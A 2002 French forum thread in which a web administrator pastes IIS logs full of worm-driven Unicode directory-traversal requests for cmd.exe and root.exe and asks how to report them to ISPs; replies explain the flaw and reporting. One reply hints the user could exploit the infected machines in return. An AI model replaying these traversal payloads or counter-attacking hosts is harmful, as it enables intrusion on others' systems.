Que dois-je adresser à un FAI en cas d'attaques sur mon serveur ?

Que dois-je adresser à un FAI en cas d'attaques sur mon serveur ? - Win NT/2K/XP - Windows & Software

Marsh Posté le 30-09-2002 à 14:32:23    

Salut,
 
Mon serveur IIS est installé depuis une semaine et mes fichiers log font des kilomètres... mais ce n'est pas des visites... mais plutot des "attaques". Je commence donc en a avoir marre... j'ai découvert que 90% de ces attaques viennent de Club-Internet (le même FAI que le mien :D) et de Madridtel... J'ai donc décidé d'envoyer un mail à ces FAI mais comme je n'ai pas l'habitude de cela je voudrais ce que je dois y mettre... Je compte mettre une copie d'une partie de mes logs mais que dois-je préciser en plus ?
 
Voila un exemple de mes logs (ca c'est c'est les logs pour aujourd'hui... et encore c'est assez calme aujourd'hui :D)
2002-09-30 05:17:44 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:46 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:47 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:49 210.99.214.x - 127.0.0.1 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:50 210.99.214.x - 127.0.0.1 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:51 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:52 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:53 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:59 210.99.214.x - 127.0.0.1 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:01 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:03 210.99.214.x - 127.0.0.1 80 GET /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:05 210.99.214.x - 127.0.0.1 80 GET /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:10 210.99.214.x - 127.0.0.1 80 GET /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:12 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:00 212.194.149.1xx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 08:26:00 212.194.149.1xx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:07 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:03 212.49.95.xx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 08:44:06 212.49.95.xx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 08:44:08 212.49.95.xx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:12 212.49.95.xx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:14 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:16 212.49.95.xx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:18 212.49.95.xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:20 212.49.95.xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 08:44:22 212.49.95.xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:25 212.49.95.xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:28 212.49.95.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:30 212.49.95.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:35 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:37 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:39 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:40 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -


Message édité par Webman le 30-09-2002 à 14:32:37
Reply

Marsh Posté le 30-09-2002 à 14:32:23   

Reply

Marsh Posté le 30-09-2002 à 14:34:26    

Tu as quoi comme connexion ?
 
Tu devrais deja commencer a interdire l'execution sur ton serveur ! Parce que ceux qui viennent chez toi on l'air de bien s'amuser.


---------------
XP1700+ 384 SDRAM ATI R@deon 64 Mo DDR ViVO
Reply

Marsh Posté le 30-09-2002 à 14:35:17    

PoKilleR a écrit a écrit :

Tu as quoi comme connexion ?
 
Tu devrais deja commencer a interdire l'execution sur ton serveur ! Parce que ceux qui viennent chez toi on l'air de bien s'amuser.




 
Une connexion ADSL, c'est du Netissimo 1.

Reply

Marsh Posté le 30-09-2002 à 14:36:53    

C quoi exactement comme serveur parce que je n'y connait pas trop. ms tu ne peux pas interdire l'execution de commande dessus ?


---------------
XP1700+ 384 SDRAM ATI R@deon 64 Mo DDR ViVO
Reply

Marsh Posté le 30-09-2002 à 14:40:13    

C'est un serveur HTTP sous IIS 5.0 mais de toute facon il y a l'interditcion d'execution au niveau du repertoire du site... de plus l'autre jour on m'a dis que cela ne risque rien tant que mon serveur est patché et mis a jour (ce qui est le cas).


Message édité par Webman le 30-09-2002 à 14:40:54
Reply

Marsh Posté le 30-09-2002 à 14:41:21    

ecris a abuse@"FAI"
mais ce sont des attaques cherchant la faille UNICODE donc tu ne crains rien
il faut savoir que tu as peu de chances que ton mail arrete ces attaques

Reply

Marsh Posté le 30-09-2002 à 14:41:29    

Tu peut toujours envoyer des plaintes aux FAI, mais bon ca changera rien du tout, y'a des milliers de scanneurs / hackeurs dans le monde.

Reply

Marsh Posté le 30-09-2002 à 14:41:54    

Je ne c pas du tout, a mon avis tu dois envoyer un mail au service client de C I et tu leur demande ce que tu dois faire.


---------------
XP1700+ 384 SDRAM ATI R@deon 64 Mo DDR ViVO
Reply

Marsh Posté le 30-09-2002 à 14:42:45    

Si tu n'avais pas patché à l'heure actuelle tu aurais CodeRed ou Nimda comme vers ;)
 
Dans les log : les erreurs 400 et 500 sont la preuve que ca ne marche pas... lance quand même de temps à autre un scan AV.


Message édité par Requin le 30-09-2002 à 14:44:33
Reply

Marsh Posté le 30-09-2002 à 14:43:14    

kraal a écrit a écrit :

ecris a abuse@"FAI"
mais ce sont des attaques cherchant la faille UNICODE donc tu ne crains rien
il faut savoir que tu as peu de chances que ton mail arrete ces attaques




 
Merci j'ai déjà les adresses mail :) Je sais que j'ai peu de chance que ca s'arrete mais bon je veux quand meme écrire pour le principe... car j'ai des logs qui font des kilomètres...
Sinon dans mon mail je merts quoi ? juste mes logs et j'explique rapidement la situation ?

Reply

Marsh Posté le 30-09-2002 à 14:43:14   

Reply

Marsh Posté le 30-09-2002 à 14:43:55    

Requin a écrit a écrit :

Si tu n'avais pas patché à l'heure actuelle tu aurais CodeRed ou Nimda comme vers ;)
 
Dans les log : les erreurs 400 et 500 sont la preuve que ca ne marche pas... lance quand même de temps à autre un scan AV.




 
Ok ! au fait merci pour les softs que tu m'a conseillé l'autre jour (pour tester IIS) ca marche trés bien :) !

Reply

Marsh Posté le 30-09-2002 à 14:44:39    

Pour le mail laisse tomber, c'est un vers qui fait cela de manière totalement automatique.  
 
En apprenant un petit peu sur ce bug tu pourrais à la limite faire des crasses aux autres (en fait tu peux executer en tant que I_USR à peu prêt n'importe quoi sur sa machine.

Reply

Marsh Posté le 30-09-2002 à 14:46:33    

Requin a écrit a écrit :

Pour le mail laisse tomber, c'est un vers qui fait cela de manière totalement automatique.  




 
Ok, l'autre jour j'ai fais un "net send" vers une adresse IP qui est apparue plusieurs centaines de fois... mais j'ai pas eu de réponses :D

Reply

Marsh Posté le 30-09-2002 à 14:48:16    

Webman a écrit a écrit :

 
 
Ok, l'autre jour j'ai fais un "net send" vers une adresse IP qui est apparue plusieurs centaines de fois... mais j'ai pas eu de réponses :D




 
Bah le gars auras reçu un avertissement c'est déjà cela...

Reply

Marsh Posté le 30-09-2002 à 14:48:18    

En théorie, il faut écrire au FAI qui héberge "l'attaquant" et lui envoyer ton fichier log. S'il y a moins de quelques centaines de tentatives sur une période courte, ce n'est pas la peine.
Ca ne veut pas dire non plus que tu auras des réponses ou que ce sera suivi d'effet. Disons que si plusieurs personnes s'en plaignent, ça peut constituer un dossier qui peut finir par aboutir...
Depuis la large diffusion des firewalls perso, il y a trop de plaintes et les FAI n'ont plus le temps. Ils ne regardent donc (enfin je suppose) que les abus les plus importants.
 

Reply

Marsh Posté le 30-09-2002 à 14:50:07    

Ok !
En tout cas merci à tous de vos réponses !

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed